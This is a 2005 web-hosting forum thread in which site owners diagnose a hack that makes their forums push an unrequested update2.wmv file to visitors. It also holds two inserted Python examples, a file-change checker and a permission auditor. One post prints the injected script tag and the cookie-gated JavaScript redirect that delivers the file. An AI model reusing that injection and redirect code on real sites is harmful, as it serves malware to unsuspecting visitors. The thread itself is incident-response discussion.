PowWeb Forums - The Perfect Community for the Perfect Host  

Old 11-23-05, 08:02 PM   #1
ComandoSupremo
 
Join Date: Nov 2001
Location: Virginia Beach, VA
Posts: 78
Reputation: 5
Hello,

I have had a few reports from forum members at www.comandosupremo.com/forum of a media file named update2.wmv popping up on the forum for download. The media file would also show a picture of an elephant. I have never put this file in the forum and I believe it may be some type of virus or trojan.

I have also noticed my topics_anywhere.php no longer works on www.comandosupremo.com. This seemed to quit working around the same time the forum experienced trouble.

Here is the code for the javascript:
<script language="JavaScript" type="text/javascript" src="http://www.comandosupremo.com/forum/topics_anywhere.php?mode=show&f=a&n=5&r=y&b=squ&lpb=0&lpd=0&lpi=y"></script>

Any help would be most appreciated!

Jim
ComandoSupremo is offline  
Old 11-23-05, 08:55 PM   #2
Mirzabah
mod_rewrite
 
Join Date: Apr 2002
Location: Melbourne, Australia
Posts: 2,038
Reputation: 166
I can confirm that when I visited your site, it tried to download a file called update2.wmv - without me asking for it. This only happened the first time - subsequent re-loads didn't do anything out of the ordinary. If you haven't already done so, I would strongly recommend changing your FTP and MySQL passwords and upgrading to the latest version of phpBB.
Mirzabah is offline  
Old 11-24-05, 06:05 PM   #3
satis
 
Join Date: Oct 2002
Location: Dallas
Posts: 2,914
Reputation: 311
I got it too. At the top of the main forum page is this line:

PHP Code:
<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script> 
I pulled up that page, which shows the following
PHP Code:
<!--
    // The current date is pushed 36 hours ahead below and used as the
    // cookie expiry, so the redirect fires at most once per browser in
    // that window (which is why it only happened on the first load).
    var currentDate = new Date();
    var adRecurrence = "daily";
    var adId = "a1087804322";
    var adExpiration = 0;
    var retry = 2;
    var flag = 0;
    var obj = null;

    currentDate.setTime(currentDate.getTime() + (1*36*60*60*1000));
    adExpiration = currentDate.toGMTString();

    function SetCookie(sName, sValue, sExpire) {
        var expireCode = "";
        if (sExpire) { expireCode = "expires=" + sExpire + ";" }
        document.cookie = sName + "=" + escape(sValue) + ";" + expireCode
    }

    function GetCookie(sName) {
        var aCookie = document.cookie.split("; ");
        for (var i=0; i < aCookie.length; i++) {
            var aCrumb = aCookie[i].split("=");
            if (sName == aCrumb[0]) { return unescape(aCrumb[1]); }
        }
        return null;
    }

    // After a further one-second delay, navigates the whole page to the
    // .wmv, which is what produced the unrequested download reported above.
    function upop() {
        setTimeout("location.href = 'http://www.dlfree.com/Update2.wmv'", 1000);
    }

    // Only runs when the marker cookie is absent: sets it, then schedules
    // the redirect ten seconds after page load.
    if (!GetCookie(adId)) {
        SetCookie(adId, "1", adExpiration);
        setTimeout("upop()", 10*1000);
    }
//-->
Obviously that's the source of the popup. The question is, is this something you added to your forum? If so...just un-add it and you'll probably be fine. If not, then at least one of your forum files has been edited, which is typically a BAD sign. If someone was able to alter one of your files, there's no telling what else they might have done. At a minimum, check your user list and make sure there aren't any new admins you don't know about, and change your password.
__________________
Satis Clankiller
Clankiller.com Forums
Clankiller.com
PlasmaSky.com
satis is offline  
Old 11-25-05, 06:04 PM   #4
dvoges
Guest
 
Posts: n/a
update2.wmf site hijack

I have likewise been hijacked at http://stringersystems.com. This is a PostNuke site using Xanthia themes.

I found that all the files in the active theme folder had been touched on 23Nov05 and the script appended.
 
Old 11-25-05, 07:08 PM   #5
satis
 
Join Date: Oct 2002
Location: Dallas
Posts: 2,914
Reputation: 311
Ah, the files were appended? If that's the case, I'd consider your forum, site, and database compromised. I would highly recommend you audit your user tables, as well as upgrade to the latest release of your forum and/or postnuke versions. Not a happy occurrence, I'm sure, but I've been through a similar procedure and it's not horribly complex. Much better than not knowing if someone else owns your website now. Be sure to change all your login information for anything that matters.
__________________
Satis Clankiller
Clankiller.com Forums
Clankiller.com
PlasmaSky.com
satis is offline  
Old 11-26-05, 04:27 AM   #6
linnetwoods
 
Join Date: Apr 2003
Location: Everywhere! Currently Mallorca, Balearic Islands
Posts: 1,460
Reputation: 86
Is there some sort of script that one can use to check for changes just before making any oneself, to see if someone else has done so? i.e. After you finished making changes on your site, you would run the script to update it, so it knew what should be there. It would tell you what changes it had found and you would OK them. Then, before making the next set of changes, you would run the script again, to see whether it reported any changes that had been made (by someone else, obviously) since your last session. At that point you would need the option to see the changes and maybe even get some info on how they got there and the option to undo all changes made since the last official update... Does it exist? Could it be created by someone who understands these mysteries that escape us ordinary web-manglers?
__________________
The pen is mightier than the sword. Except when the other guy has the sword
LinnetWoods.com
Your Website
US Shopping Mall
Innit Though? (my blog)
linnetwoods is offline  
Old 11-26-05, 05:24 AM   #7
IanS
Former Spam Filter (EU)
 
Join Date: Mar 2004
Location: Washington (THE original UK one!)
Posts: 12,897
Reputation: 470
A bit like the md5 system (now defunct) for passing ISO images. The problem I see with this is that although the scripts won't change, with blogs and other dynamic data around the hash totals would also change unless you could specify the files to include (or exclude).
__________________
This is a Powweb customer
helping Powweb customer forum.

I am a customer just like you!!

Some matters can only be answered by staff or support.
Give it a go - ask here first!
IanS is offline  
Old 11-26-05, 11:31 PM   #8
satis
 
Join Date: Oct 2002
Location: Dallas
Posts: 2,914
Reputation: 311
you could do it with md5. MD5 still works, it's just 'hackable'. For something like a checksum hash I'm sure it'd still be useful.

You could probably set up a php page with a cron job...have it fopen all the files, stuff all the contents into an md5, then store the hash somewhere (like a db table or a flat file). Actually, a db table would be great...one row per day per file or something. Then have it compare the previous day's hashes with the current day's and raise a warning if they're different.

As long as you're doing it on the static background php pages (and not cached templates or anything truly dynamic) that'd be a great way to do it. Good idea IanS. Now to trick Extras or someone into coding it. hehe.
__________________
Satis Clankiller
Clankiller.com Forums
Clankiller.com
PlasmaSky.com
satis is offline  
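A worked version of the baseline-and-compare idea satis sketches above, as an added example (it is not satis's code or anything from this thread). It swaps MD5 for SHA-256 (same idea, stronger hash), stores the baseline in a JSON flat file instead of a DB table, skips directory names assumed to hold dynamic data (cache, templates_c, uploads, the caveat IanS raises), and records each file's mtime alongside its hash, the clue dvoges used to spot the appended script. The site tree, its file contents and the injected script tag are all constructed for the demo.

```python
import hashlib
import json
import os
import tempfile

# Directories whose contents legitimately change between runs. Names are an
# assumption for this example; adjust to the site's real cache/upload dirs.
DYNAMIC_DIRS = {"cache", "templates_c", "uploads"}


def hash_file(path, chunk=65536):
    """SHA-256 of a file's contents, read in chunks so large files are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root, skip=DYNAMIC_DIRS):
    """Map each file's path (relative to root) to its hash and mtime."""
    snap = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip]
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = {"sha256": hash_file(full),
                         "mtime": int(os.stat(full).st_mtime)}
    return snap


def compare(old, new):
    """Report files added, removed, or whose hash differs from the baseline."""
    old_set, new_set = set(old), set(new)
    return {
        "added": sorted(new_set - old_set),
        "removed": sorted(old_set - new_set),
        "changed": sorted(p for p in old_set & new_set
                          if old[p]["sha256"] != new[p]["sha256"]),
    }


def save_baseline(path, snap):
    with open(path, "w") as f:
        json.dump(snap, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def run_check(root, baseline_path):
    """Cron entry point. The baseline is only rewritten by the owner after
    reviewing the report (call save_baseline), so someone else's edits keep
    being reported until they are explicitly accepted."""
    return compare(load_baseline(baseline_path), snapshot(root))


def demo():
    """Constructed site tree: take a baseline, then simulate the kind of
    change seen in this thread (a script tag appended to a forum page, a
    new file dropped in) and return what the check reports."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "site")
    for d in ("forum", "cache"):
        os.makedirs(os.path.join(root, d))
    files = {
        "index.php": "<?php include 'header.php'; ?>\n",
        "forum/index.php": "<?php include 'common.php'; ?>\n",
        "cache/page.html": "<p>cached copy</p>\n",
    }
    for rel, text in files.items():
        with open(os.path.join(root, rel), "w") as f:
            f.write(text)
    baseline = os.path.join(base, "baseline.json")
    save_baseline(baseline, snapshot(root))

    # Simulated tampering (constructed): an injected script tag, a dropped
    # file, and a change inside the excluded cache dir that must not show up.
    with open(os.path.join(root, "forum/index.php"), "a") as f:
        f.write("<script src='http://example.invalid/stat.php'></script>\n")
    with open(os.path.join(root, "forum/update2.wmv"), "wb") as f:
        f.write(b"\x00" * 16)
    with open(os.path.join(root, "cache/page.html"), "w") as f:
        f.write("<p>regenerated</p>\n")
    return run_check(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it from cron against the real document root with a baseline file stored outside that root (so an intruder who can write to the site cannot also rewrite the baseline), and only call save_baseline after you have looked at the report.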
Old 11-27-05, 07:31 AM   #9
extras
on hiatus
 
Join Date: Mar 2004
Location: Canada
Posts: 5,815
Reputation: 314
Quote:
Originally Posted by satis
Now to trick Extras or someone into coding it. hehe.
I will not write something like that.
It's not effective.

I mean, it only tries to detect an already-cracked situation, and it's too late.
Also, it's going to be extremely heavy; some people will abuse it and harm everyone.

It's better to detect bad permission settings (666, 777, ...),
unsafe scripts, and other vulnerabilities BEFORE being cracked.

But I don't think I will write that either, as it's going to be a heavy script
(although not as heavy as checking md5 or CRC), and people who need them
will abuse the script, most probably.


The real problem is, let's say, the lack of education.
Constructing a safe site is easy.

The ten commandments for safer web site (for PowWeb users)
Quote:
1. Use safer permission setting of 710 instead of 755 for all directories.
2. Use even safer permission of 700 for directories not directly accessed by Apache.
3. Use 750 only for directories you want to use Apache's default directory listing.

4. Use safer permission of 600 instead of 640 for ALL PHP scripts.
5. Use safer permission of 700 instead of 755 for ALL CGI scripts.

6. Password protect ALL scripts other than you want general public to access,
including webstats provided by PowWeb.

7. Avoid using unsafe scripts: Matt's Formmail.pl, phpBB2, php-Nuke,
and many other PHP and CGI scripts. I guess 90% of cracking happens this way.

Remember that PHP is a vulnerable, buggy, and risky language,
and scripts written with it are often very vulnerable, buggy, and risky.

Static content requires much less maintenance and is a lot safer,
and can be as cool as stupid CMS/BLOG constructions.

8. Check the IP of last access for OPS, FTP, and mail, regularly.
9. Check your raw log to see suspicious access and cracking attempts.

10. Keep your PC safe. If your PC is compromised, bad people can obtain
access to your site and lots of personal information.

DO NOT trust BIG corporation, like MS, SONY, and so on.
These guys often create stupid products, but they can be clever in deceiving naive users.

Stay away from hyped, fancy, needless, or heavy features.
Stay away from IE/OE, html mail, Javascript, and so on.
Now, I think what we need is something to replace PHP and its badly written apps.
PHP is a cancer of shared hosting in terms of security and resource usage.
(On a dedicated server or VPS, it's not as bad.)

Some PHP users are dreaming that Ruby on Rails will be the savior, but I don't think so.
It's still too heavy, and the apps will be written by the same PHP coders who have been
writing unsafe, inefficient scripts, so the end result will be similar.

I've experimented with OCaml and found it pretty fast and small.
And I will probably write a replacement form mailer and simple CMS with it.


The main problem is the ignorance, again.
People are not aware of how much they are suffering from bad hype around PHP,
just like they are suffering from unsafe MS products such as IE/OE.

And I don't foresee any change in this area very soon, unfortunately.
I've been telling this many times in this forum.
Yet most people are still using unsafe permissions and vulnerable scripts without protection.
It's nearly "normal" and inevitable to get cracked.
extras is offline  
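An audit of the directory and script modes listed in the ten commandments above, as an added example; this is not extras's 666.cgi and is not taken from this thread. It assumes PHP and CGI scripts run as the file owner (the premise behind 600 and 700 working at all), that the site owner names the directories not served by Apache (700) and those meant for Apache's directory listing (750), and that a static file with group/world write bits should lose them (the 666 case the script name refers to). The sample tree and its modes are constructed; the extension lists are an assumption.

```python
import os
import stat
import tempfile

# Modes from the list above. Which directories are "private" (not served by
# Apache) or "listing" (Apache's default index wanted) is site-specific and
# is passed in by the owner.
DIR_MODE = 0o710
PRIVATE_DIR_MODE = 0o700
LISTING_DIR_MODE = 0o750
PHP_MODE = 0o600
CGI_MODE = 0o700
PHP_EXTS = (".php", ".php3", ".phtml", ".inc")   # assumption
CGI_EXTS = (".cgi", ".pl")                       # assumption


def _under(rel, dirs):
    return any(rel == d or rel.startswith(d + "/") for d in dirs)


def expected_mode(rel, is_dir, actual, private_dirs=(), listing_dirs=()):
    """Mode the rule set wants for this entry, or None if it is acceptable."""
    if is_dir:
        want = (PRIVATE_DIR_MODE if _under(rel, private_dirs)
                else LISTING_DIR_MODE if rel in listing_dirs
                else DIR_MODE)
    else:
        ext = os.path.splitext(rel)[1].lower()
        if ext in PHP_EXTS:
            want = PHP_MODE
        elif ext in CGI_EXTS:
            want = CGI_MODE
        elif actual & 0o022:
            # Static content has no fixed mode in the list, but 666-style
            # group/world write is exactly what 666.cgi is named after.
            want = actual & ~0o022
        else:
            return None
    return None if want == actual else want


def audit(root, private_dirs=(), listing_dirs=(), fix=False):
    """Return [(relative path, actual mode, wanted mode)] for every entry
    that deviates from the rules; with fix=True also chmod it."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(d, True) for d in dirnames] + [(f, False) for f in filenames]
        for name, is_dir in entries:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # never chmod through a symlink
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            actual = stat.S_IMODE(os.stat(full).st_mode)
            want = expected_mode(rel, is_dir, actual, private_dirs, listing_dirs)
            if want is not None:
                findings.append((rel, actual, want))
                if fix:
                    os.chmod(full, want)
    return sorted(findings)


def demo():
    """Constructed site tree with the loose modes the list warns about;
    returns the audit before and after fixing."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "site")
    dirs = {"forum": 0o777, "includes": 0o755, "downloads": 0o750, "cgi-bin": 0o755}
    files = {"forum/index.php": 0o644, "cgi-bin/formmail.pl": 0o755,
             "style.css": 0o666, "index.html": 0o644}
    for rel in dirs:
        os.makedirs(os.path.join(root, rel))
    for rel in files:
        with open(os.path.join(root, rel), "w") as f:
            f.write("/* constructed */\n")
    for rel, mode in list(dirs.items()) + list(files.items()):
        os.chmod(os.path.join(root, rel), mode)
    opts = dict(private_dirs=("includes",), listing_dirs=("downloads",))
    before = audit(root, **opts)
    audit(root, fix=True, **opts)
    return {"before": before, "after": audit(root, **opts)}


if __name__ == "__main__":
    for rel, actual, want in demo()["before"]:
        print("%-22s %o -> %o" % (rel, actual, want))
```

Run it first without fix=True and read the report; the two directory lists are the only site-specific input, and getting them wrong (marking a served directory as private) is the one way this script can break a working site, which is why it reports before it changes anything.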
Old 11-27-05, 01:24 PM   #10
linnetwoods
 
Join Date: Apr 2003
Location: Everywhere! Currently Mallorca, Balearic Islands
Posts: 1,460
Reputation: 86
I know nothing about anything but I came to the conclusion (borne out by a quick glance at the proportion of threads with problems on php on this very forum!) that I should forget trying to use php or MySQL and stick with the simplicity of html, when building some shops for a client. He is really pleased with the results, everything works and the shops are unique instead of being very much like a zillion others. We used PayPal as they have now decided that people can pay by credit card without having to join.

I can see that for a forum or chat room there is probably no alternative but shops and galleries can be made in html without too much slog and they aren't bug-ridden.
__________________
The pen is mightier than the sword. Except when the other guy has the sword
LinnetWoods.com
Your Website
US Shopping Mall
Innit Though? (my blog)
linnetwoods is offline  
Old 11-27-05, 03:32 PM   #11
extras
on hiatus
 
Join Date: Mar 2004
Location: Canada
Posts: 5,815
Reputation: 314
I wrote a small script that checks for unsafe permissions and corrects them.

To use, install extratools.php (automatic installer)
http://check-these.info/tools/extratools_php.txt

Then, click on "Install/Update 666.cgi".
When installation is finished, click on the link "666.cgi" or "Run 666.cgi".

This will prevent at least simple cracking done via directory with unsafe permission,
like some people in this thread have suffered.

Note:
If you have a site with lots of files, it may timeout.
It's a slow script, and it won't cause resource abuse, AFAIK.
extras is offline  
Contents ©PowWeb, Inc. ~ vBulletin, Copyright 2000-2007 Jelsoft Enterprises Limited.